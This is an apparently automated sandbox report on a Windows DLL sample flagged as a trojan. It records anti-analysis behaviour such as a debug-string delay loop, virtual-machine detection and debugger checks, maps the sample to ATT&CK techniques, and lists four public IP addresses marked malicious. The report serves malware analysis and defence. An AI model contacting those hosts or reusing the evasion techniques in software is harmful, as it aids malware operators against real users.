Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion:

Tries to delay execution (extensive OutputDebugStringW loop)

Show sources

Source: C:\Windows\System32\loaddll32.exe

Section loaded: OutputDebugStringW count: 1625

Source: C:\Windows\System32\loaddll32.exe

Window / User API: threadDelayed 1625

Jump to behavior

Source: C:\Windows\System32\loaddll32.exe

Code function: 0_2_6E7D0730 GetTokenInformation,GetSystemInfo,GetTokenInformation,

0_2_6E7D0730

Source: Amcache.hve.7.dr	Binary or memory string: VMware
Source: Amcache.hve.7.dr	Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/5&1ec51bf7&0&000000
Source: Amcache.hve.7.dr	Binary or memory string: @scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/5&280b647&0&000000
Source: Amcache.hve.7.dr	Binary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.7.dr	Binary or memory string: VMware-42 35 9c fb 73 fa 4e 1b-fb a4 60 e7 7b e5 4a ed
Source: Amcache.hve.7.dr	Binary or memory string: VMware, Inc.
Source: Amcache.hve.7.dr	Binary or memory string: VMware Virtual disk SCSI Disk Devicehbin
Source: Amcache.hve.7.dr	Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.7.dr	Binary or memory string: VMware7,1
Source: Amcache.hve.7.dr	Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.7.dr	Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: Amcache.hve.7.dr	Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW71.00V.13989454.B64.1906190538,BiosReleaseDate:06/19/2019,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware7,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: WerFault.exe, 00000007.00000002.697619692.00000000048FC000.00000004.00000001.sdmp	Binary or memory string: Hyper-V RAW
Source: Amcache.hve.7.dr	Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.7.dr	Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: WerFault.exe, 00000007.00000002.697619692.00000000048FC000.00000004.00000001.sdmp	Binary or memory string: Hyper-V RAWH
Source: Amcache.hve.7.dr	Binary or memory string: VMware, Inc.me
Source: Amcache.hve.7.dr	Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/5&280b647&0&000000
Source: WerFault.exe, 00000007.00000003.693316382.000000000499D000.00000004.00000001.sdmp, WerFault.exe, 00000007.00000002.699046693.000000000499D000.00000004.00000001.sdmp	Binary or memory string: Hyper-V RAW
Source: Amcache.hve.7.dr	Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/5&1ec51bf7&0&000000

Source: C:\Windows\SysWOW64\rundll32.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Windows\System32\loaddll32.exe

Code function: 0_2_6E7C6D0C GetUserNameW,MessageBoxW,GetLastError,CreateFileA,DebugBreak,FlushFileBuffers,FreeEnvironmentStringsA,GetConsoleOutputCP,GetEnvironmentStrings,GetLocaleInfoA,GetStartupInfoA,GetStringTypeA,HeapValidate,IsBadReadPtr,LCMapStringA,LoadLibraryA,OutputDebugStringA,

0_2_6E7C6D0C

Source: C:\Windows\System32\loaddll32.exe

Code function: 0_2_6E7D3138 RtlAddVectoredExceptionHandler,

0_2_6E7D3138

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\triage_dropped_file.dll",#1

Jump to behavior

Source: loaddll32.exe, 00000000.00000002.1189841282.0000000001770000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000000.669444992.0000000003820000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000000.671592848.0000000003820000.00000002.00020000.sdmp	Binary or memory string: Program Manager
Source: loaddll32.exe, 00000000.00000002.1189841282.0000000001770000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000000.669444992.0000000003820000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000000.671592848.0000000003820000.00000002.00020000.sdmp	Binary or memory string: Shell_TrayWnd
Source: loaddll32.exe, 00000000.00000002.1189841282.0000000001770000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000000.669444992.0000000003820000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000000.671592848.0000000003820000.00000002.00020000.sdmp	Binary or memory string: Progman
Source: loaddll32.exe, 00000000.00000002.1189841282.0000000001770000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000000.669444992.0000000003820000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000000.671592848.0000000003820000.00000002.00020000.sdmp	Binary or memory string: Progmanlock

Source: C:\Windows\System32\loaddll32.exe

Code function: GetUserNameW,MessageBoxW,GetLastError,CreateFileA,DebugBreak,FlushFileBuffers,FreeEnvironmentStringsA,GetConsoleOutputCP,GetEnvironmentStrings,GetLocaleInfoA,GetStartupInfoA,GetStringTypeA,HeapValidate,IsBadReadPtr,LCMapStringA,LoadLibraryA,OutputDebugStringA,

0_2_6E7C6D0C

Source: C:\Windows\System32\loaddll32.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: C:\Windows\System32\loaddll32.exe

0_2_6E7C6D0C

Source: Amcache.hve.7.dr

Binary or memory string: c:\program files\windows defender\msmpeng.exe

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Windows Management Instrumentation	Path Interception	Process Injection12	Virtualization/Sandbox Evasion11	OS Credential Dumping	Security Software Discovery31	Remote Services	Archive Collected Data1	Exfiltration Over Other Network Medium	Encrypted Channel1	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	Process Injection12	LSASS Memory	Virtualization/Sandbox Evasion11	Remote Desktop Protocol	Data from Removable Media	Exfiltration Over Bluetooth	Application Layer Protocol1	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	Obfuscated Files or Information1	Security Account Manager	Process Discovery1	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Steganography	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Rundll321	NTDS	Application Window Discovery1	Distributed Component Object Model	Input Capture	Scheduled Transfer	Protocol Impersonation	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Software Packing	LSA Secrets	Account Discovery1	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Steganography	Cached Domain Credentials	System Owner/User Discovery1	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Compile After Delivery	DCSync	Remote System Discovery1	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	Indicator Removal from Tools	Proc Filesystem	System Information Discovery13	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
triage_dropped_file.dll	21%	Virustotal		Browse

Dropped Files

No Antivirus matches

Unpacked PE Files

Source	Detection	Scanner	Label	Download
3.2.rundll32.exe.6e7c0000.2.unpack	100%	Avira	HEUR/AGEN.1144420	Download File
3.0.rundll32.exe.6e7c0000.5.unpack	100%	Avira	HEUR/AGEN.1144420	Download File
0.2.loaddll32.exe.e80000.0.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
3.0.rundll32.exe.2fe0000.0.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
3.0.rundll32.exe.2fe0000.3.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
3.0.rundll32.exe.6e7c0000.2.unpack	100%	Avira	HEUR/AGEN.1144420	Download File
3.2.rundll32.exe.2fe0000.0.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
0.2.loaddll32.exe.6e7c0000.2.unpack	100%	Avira	HEUR/AGEN.1144420	Download File

Domains

No Antivirus matches

URLs

Source	Detection	Scanner	Label	Link
http://www.forex-broker.websiteDVarFileInfo$	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

No contacted domains info

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://upx.sf.net	Amcache.hve.7.dr	false		high
http://www.forex-broker.websiteDVarFileInfo$	loaddll32.exe, 00000000.00000002.1190003602.000000006E7DF000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000002.703186360.000000006E7DF000.00000002.00020000.sdmp	false	Avira URL Cloud: safe	low

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	ASN	ASN Name	Malicious
185.4.135.27	unknown	Greece	199246	TOPHOSTGR	true
85.10.248.28	unknown	Germany	24940	HETZNER-ASDE	true
80.211.3.13	unknown	Italy	31034	ARUBA-ASNIT	true
144.91.122.102	unknown	Germany	51167	CONTABODE	true

General Information

Joe Sandbox Version:	34.0.0 Boulder Opal
Analysis ID:	544201
Start date:	22.12.2021
Start time:	20:30:19
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 8m 24s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	triage_dropped_file (renamed file extension from none to dll)
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	21
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal76.troj.evad.winDLL@6/6@0/4
EGA Information:	Failed
HDC Information:	Successful, ratio: 99.8% (good quality ratio 96.9%) Quality average: 79.5% Quality standard deviation: 26.1%
HCA Information:	Failed
Cookbook Comments:	Adjust boot time Enable AMSI Override analysis time to 240s for rundll32
Warnings:	Show All Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, WerFault.exe, backgroundTaskHost.exe, svchost.exe, wuapihost.exe Excluded IPs from analysis (whitelisted): 23.54.113.53, 20.42.65.92 Excluded domains from analysis (whitelisted): ris.api.iris.microsoft.com, e12564.dspb.akamaiedge.net, onedsblobprdeus17.eastus.cloudapp.azure.com, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net, ctldl.windowsupdate.com, store-images.s-microsoft.com-c.edgekey.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, watson.telemetry.microsoft.com, arc.msn.com Not all processes where analyzed, report is missing behavior information

Simulations

Behavior and APIs

Time	Type	Description
20:31:35	API Interceptor	1x Sleep call for process: WerFault.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link
185.4.135.27	SecuriteInfo.com.BehavesLike.Win32.Drixed.hc.23689.dll	Get hash	malicious	Browse
	SecuriteInfo.com.W32.AIDetect.malware1.26365.dll	Get hash	malicious	Browse
	SecuriteInfo.com.W32.AIDetect.malware1.11362.dll	Get hash	malicious	Browse
	SecuriteInfo.com.W32.AIDetect.malware1.23460.dll	Get hash	malicious	Browse
	SecuriteInfo.com.W32.AIDetect.malware1.23460.dll	Get hash	malicious	Browse
	Positive_Result_75184731.xls	Get hash	malicious	Browse
	SecuriteInfo.com.W32.AIDetect.malware1.4295.dll	Get hash	malicious	Browse
	SecuriteInfo.com.W32.AIDetect.malware1.4295.dll	Get hash	malicious	Browse
	SecuriteInfo.com.W32.AIDetect.malware1.26189.dll	Get hash	malicious	Browse
	SecuriteInfo.com.ML.PE-A+Troj.Dridex-AJA.26363.dll	Get hash	malicious	Browse
	SecuriteInfo.com.W32.AIDetect.malware1.16860.dll	Get hash	malicious	Browse
	SecuriteInfo.com.W32.AIDetect.malware1.25234.dll	Get hash	malicious	Browse
	SecuriteInfo.com.W32.AIDetect.malware1.26189.dll	Get hash	malicious	Browse
	SecuriteInfo.com.ML.PE-A+Troj.Dridex-AJA.26363.dll	Get hash	malicious	Browse
	SecuriteInfo.com.W32.AIDetect.malware1.16860.dll	Get hash	malicious	Browse
	SecuriteInfo.com.W32.AIDetect.malware1.25234.dll	Get hash	malicious	Browse
	SecuriteInfo.com.W32.AIDetect.malware1.26959.dll	Get hash	malicious	Browse
	SecuriteInfo.com.W32.AIDetect.malware1.31779.dll	Get hash	malicious	Browse
	SecuriteInfo.com.W32.AIDetect.malware1.20482.dll	Get hash	malicious	Browse
	SecuriteInfo.com.W32.AIDetect.malware1.24851.dll	Get hash	malicious	Browse
85.10.248.28	SecuriteInfo.com.BehavesLike.Win32.Drixed.hc.23689.dll	Get hash	malicious	Browse
	SecuriteInfo.com.W32.AIDetect.malware1.26365.dll	Get hash	malicious	Browse
	SecuriteInfo.com.W32.AIDetect.malware1.11362.dll	Get hash	malicious	Browse
	SecuriteInfo.com.W32.AIDetect.malware1.23460.dll	Get hash	malicious	Browse
	SecuriteInfo.com.W32.AIDetect.malware1.23460.dll	Get hash	malicious	Browse
	Positive_Result_75184731.xls	Get hash	malicious	Browse
	SecuriteInfo.com.W32.AIDetect.malware1.4295.dll	Get hash	malicious	Browse
	SecuriteInfo.com.W32.AIDetect.malware1.4295.dll	Get hash	malicious	Browse
	SecuriteInfo.com.W32.AIDetect.malware1.26189.dll	Get hash	malicious	Browse
	SecuriteInfo.com.ML.PE-A+Troj.Dridex-AJA.26363.dll	Get hash	malicious	Browse
	SecuriteInfo.com.W32.AIDetect.malware1.16860.dll	Get hash	malicious	Browse
	SecuriteInfo.com.W32.AIDetect.malware1.25234.dll	Get hash	malicious	Browse
	SecuriteInfo.com.W32.AIDetect.malware1.26189.dll	Get hash	malicious	Browse
	SecuriteInfo.com.ML.PE-A+Troj.Dridex-AJA.26363.dll	Get hash	malicious	Browse
	SecuriteInfo.com.W32.AIDetect.malware1.16860.dll	Get hash	malicious	Browse
	SecuriteInfo.com.W32.AIDetect.malware1.25234.dll	Get hash	malicious	Browse
	SecuriteInfo.com.W32.AIDetect.malware1.26959.dll	Get hash	malicious	Browse
	SecuriteInfo.com.W32.AIDetect.malware1.31779.dll	Get hash	malicious	Browse
	SecuriteInfo.com.W32.AIDetect.malware1.20482.dll	Get hash	malicious	Browse
	SecuriteInfo.com.W32.AIDetect.malware1.24851.dll	Get hash	malicious	Browse

Domains

No context

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
TOPHOSTGR	SecuriteInfo.com.BehavesLike.Win32.Drixed.hc.23689.dll	Get hash	malicious	Browse	185.4.135.27
	SecuriteInfo.com.W32.AIDetect.malware1.26365.dll	Get hash	malicious	Browse	185.4.135.27
	SecuriteInfo.com.W32.AIDetect.malware1.11362.dll	Get hash	malicious	Browse	185.4.135.27
	SecuriteInfo.com.W32.AIDetect.malware1.23460.dll	Get hash	malicious	Browse	185.4.135.27
	SecuriteInfo.com.W32.AIDetect.malware1.23460.dll	Get hash	malicious	Browse	185.4.135.27
	Positive_Result_75184731.xls	Get hash	malicious	Browse	185.4.135.27
	SecuriteInfo.com.W32.AIDetect.malware1.4295.dll	Get hash	malicious	Browse	185.4.135.27
	SecuriteInfo.com.W32.AIDetect.malware1.4295.dll	Get hash	malicious	Browse	185.4.135.27
	SecuriteInfo.com.W32.AIDetect.malware1.26189.dll	Get hash	malicious	Browse	185.4.135.27
	SecuriteInfo.com.ML.PE-A+Troj.Dridex-AJA.26363.dll	Get hash	malicious	Browse	185.4.135.27
	SecuriteInfo.com.W32.AIDetect.malware1.16860.dll	Get hash	malicious	Browse	185.4.135.27
	SecuriteInfo.com.W32.AIDetect.malware1.25234.dll	Get hash	malicious	Browse	185.4.135.27
	SecuriteInfo.com.W32.AIDetect.malware1.26189.dll	Get hash	malicious	Browse	185.4.135.27
	SecuriteInfo.com.ML.PE-A+Troj.Dridex-AJA.26363.dll	Get hash	malicious	Browse	185.4.135.27
	SecuriteInfo.com.W32.AIDetect.malware1.16860.dll	Get hash	malicious	Browse	185.4.135.27
	SecuriteInfo.com.W32.AIDetect.malware1.25234.dll	Get hash	malicious	Browse	185.4.135.27
	SecuriteInfo.com.W32.AIDetect.malware1.26959.dll	Get hash	malicious	Browse	185.4.135.27
	SecuriteInfo.com.W32.AIDetect.malware1.31779.dll	Get hash	malicious	Browse	185.4.135.27
	SecuriteInfo.com.W32.AIDetect.malware1.20482.dll	Get hash	malicious	Browse	185.4.135.27
	SecuriteInfo.com.W32.AIDetect.malware1.24851.dll	Get hash	malicious	Browse	185.4.135.27
HETZNER-ASDE	SecuriteInfo.com.BehavesLike.Win32.Drixed.hc.23689.dll	Get hash	malicious	Browse	85.10.248.28
	SecuriteInfo.com.W32.AIDetect.malware1.26365.dll	Get hash	malicious	Browse	85.10.248.28
	SecuriteInfo.com.W32.AIDetect.malware1.11362.dll	Get hash	malicious	Browse	85.10.248.28
	SecuriteInfo.com.W32.AIDetect.malware1.23460.dll	Get hash	malicious	Browse	85.10.248.28
	UGDLmAm2UI.exe	Get hash	malicious	Browse	176.9.111.171
	SecuriteInfo.com.W32.AIDetect.malware1.23460.dll	Get hash	malicious	Browse	85.10.248.28
	Positive_Result_75184731.xls	Get hash	malicious	Browse	85.10.248.28
	SecuriteInfo.com.W32.AIDetect.malware1.4295.dll	Get hash	malicious	Browse	85.10.248.28
	SecuriteInfo.com.W32.AIDetect.malware1.4295.dll	Get hash	malicious	Browse	85.10.248.28
	tTy0oHh7FM.exe	Get hash	malicious	Browse	148.251.234.83
	ykTwsaBnqa.exe	Get hash	malicious	Browse	144.76.84.177
	SecuriteInfo.com.W32.AIDetect.malware1.26189.dll	Get hash	malicious	Browse	85.10.248.28
	SecuriteInfo.com.ML.PE-A+Troj.Dridex-AJA.26363.dll	Get hash	malicious	Browse	85.10.248.28
	SecuriteInfo.com.W32.AIDetect.malware1.16860.dll	Get hash	malicious	Browse	85.10.248.28
	SecuriteInfo.com.W32.AIDetect.malware1.25234.dll	Get hash	malicious	Browse	85.10.248.28
	SecuriteInfo.com.W32.AIDetect.malware1.26189.dll	Get hash	malicious	Browse	85.10.248.28
	SecuriteInfo.com.ML.PE-A+Troj.Dridex-AJA.26363.dll	Get hash	malicious	Browse	85.10.248.28
	SecuriteInfo.com.W32.AIDetect.malware1.16860.dll	Get hash	malicious	Browse	85.10.248.28
	SecuriteInfo.com.W32.AIDetect.malware1.25234.dll	Get hash	malicious	Browse	85.10.248.28
	SecuriteInfo.com.W32.AIDetect.malware1.26959.dll	Get hash	malicious	Browse	85.10.248.28

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_rundll32.exe_ec6115aeb189d7d59bb1a88bf53c0a942c0e358_82810a17_1240230c\Report.wer Download File
Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Little-endian UTF-16 Unicode text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.9152035705418007
Encrypted:	false
SSDEEP:	192:OCpic0oXuF/HBUZMX4jed+9T/u7skS274ItWc:ti6Xq/BUZMX4je0/u7skX4ItWc
MD5:	B42CE31931FA6A0E0BF6D515319A6CCA
SHA1:	B1A7EF8C7B8C45A96775DE9D6228E820E07EA4CB
SHA-256:	8A81B01C2521FDBB80EFF7E0697995196337CEC627BC9CF68CD07E1385359275
SHA-512:	4BAC6D0CE3409052889C6C836377B5FAC669B83D06F6FDA4DE1209FD7F44B88D167441F2124F5572964A342290FB8C717422BC1A561B1CFA549B82A772B9F2CA
Malicious:	false
Reputation:	low
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.2.8.4.6.7.5.0.8.7.9.7.8.2.8.7.3.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.2.8.4.6.7.5.0.9.3.8.8.4.5.0.5.4.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.6.1.5.7.3.6.1.a.-.8.c.d.f.-.4.6.6.1.-.b.7.4.9.-.2.6.c.9.a.0.8.b.d.4.3.b.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.2.8.8.2.3.8.c.b.-.3.7.6.c.-.4.e.0.e.-.8.8.d.9.-.4.8.6.4.6.9.4.2.c.8.c.6.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.r.u.n.d.l.l.3.2...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.R.U.N.D.L.L.3.2...E.X.E.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.4.d.c.-.0.0.0.1.-.0.0.1.b.-.e.1.6.e.-.2.b.8.0.6.a.f.7.d.7.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.b.c.c.5.d.c.3.2.2.2.0.3.4.d.3.f.2.5.7.f.1.f.d.3.5.8.8.9.e.5.b.e.9.0.f.0.9.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER110D.tmp.xml Download File
Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4648
Entropy (8bit):	4.457245636674434
Encrypted:	false
SSDEEP:	48:cvIwSD8zsfJgtWI9+bkWSC8Bo8fm8M4JCdsFVhFTG+q8/ixBG4SrS0d:uITfBRb9SNjJRGuDW0d
MD5:	BD4C4D1C2D178201B210F3232F579AA7
SHA1:	4054FBB95D1509647774AF7861759C4957300668
SHA-256:	5BE01AEB609502CD0D3F0B665280555FEC363519E488364BDF1478A5708B98AB
SHA-512:	C40D72AA25519BCE50E1EC334622A7F92298443E8BD4D537AA1CC87CB3E4A68AF49410B7F5D863E3DBC4D428CF216A5AFFF3346590DECF1F9B5E1C2FC38EF059
Malicious:	false
Reputation:	low
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1309242" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..

C:\ProgramData\Microsoft\Windows\WER\Temp\WER747.tmp.dmp Download File
Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 14 streams, Wed Dec 22 19:31:29 2021, 0x1205a4 type
Category:	dropped
Size (bytes):	43998
Entropy (8bit):	2.154852029864072
Encrypted:	false
SSDEEP:	192:LHWEIZVOdmO5SkbmRPHWu7tEXJZkRrcTpKIsp4YPQlKC2:6EIW5LbWHOEqpmhPQlS
MD5:	81784F986C251801998945F25F9F1596
SHA1:	9A1C1617CD8EEE41D6FCB0196E2228F267456999
SHA-256:	5F145465162E5568CCDAADA9B232D48CA439B2BBAA54033664A841EA983211EE
SHA-512:	92DC53A2B6C111CBD593AFE3CD1126F8C0D79D6A05AA2A417F2BC505F8443419C63978AB201AB4F6D1C5BC5B3E486C90D22AC5CEB8F9B3616BFD5AE46E6E2768
Malicious:	false
Reputation:	low
Preview:	MDMP....... ........}.a.........................................-..........T.......8...........T...........@................................................................................................U...........B...... .......GenuineIntelW...........T............}.a.............................0..=...............W... .E.u.r.o.p.e. .S.t.a.n.d.a.r.d. .T.i.m.e.......................................W... .E.u.r.o.p.e. .D.a.y.l.i.g.h.t. .T.i.m.e.......................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.....................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WERE4D.tmp.WERInternalMetadata.xml Download File
Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
Category:	dropped
Size (bytes):	8278
Entropy (8bit):	3.6919358880255273
Encrypted:	false
SSDEEP:	192:Rrl7r3GLNi3o67zzL06YSj6ngmfT+KS4rs+prm89bZ1sf7zm:RrlsNi46U6Y26ngmfTrS0ZOf+
MD5:	7A305581E9CD501E9E74F1F75A83494C
SHA1:	F78406D8117B4E4ACA3464EB31C18F6E756BC5D7
SHA-256:	D9E3B50901899C276A4DAFC281D5F601FDEEF9497AEFE4DD9A81BB726CCAB894
SHA-512:	61C510D79CCF3842E361F227E59C3A3BBF3DA463B5B9ABC3BAD9FD763B4095CCF9CC543AF127104F078177AAA8F2FE94AF5A9D2F833C30D6E9EA2054633E155B
Malicious:	false
Reputation:	low
